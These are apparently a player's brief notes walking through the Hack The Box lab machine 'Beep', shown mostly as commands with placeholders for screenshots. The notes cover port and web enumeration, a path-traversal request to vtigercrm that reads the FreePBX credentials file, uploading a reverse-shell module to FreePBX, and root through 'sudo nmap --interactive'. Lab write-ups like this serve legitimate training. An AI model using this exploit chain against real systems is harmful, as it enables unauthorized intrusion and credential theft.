echo "10.129.1.226 beep.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.226 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -T4 -oA output 10.129.1.226 --script=vuln -v

nmap -sT -sV -sC -Pn -p- 10.129.1.226

nikto -h 10.129.1.226:80

gobuster dir -u http://10.129.1.226 -w /usr/share/dirb/wordlists/big.txt -t 20

Pasted image 20210304221027.png

curl -k "http://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action"

https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Pasted image 20210304221045.png

https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module

Pasted image 20210304221111.png

git clone https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module 130 ⨯ cd FreePBX-Reverse-Shell-Module
vim shell/install.php
tar -cvzf shell-1.0.tar.gz shell

Pasted image 20210304221137.png

Pasted image 20210304221145.png

Pasted image 20210304221153.png

Click on process and then confirm

Pasted image 20210304221111.png

Pasted image 20210304221221.png

Pasted image 20210304221229.png

sh-3.2$ sudo -l sh-3.2$ sudo nmap --interactive nmap> !sh python -c "import pty; pty.spawn('/bin/bash')"

Pasted image 20210304221247.png

boxes

copyright©2022 Cu3rv0x all rights reserved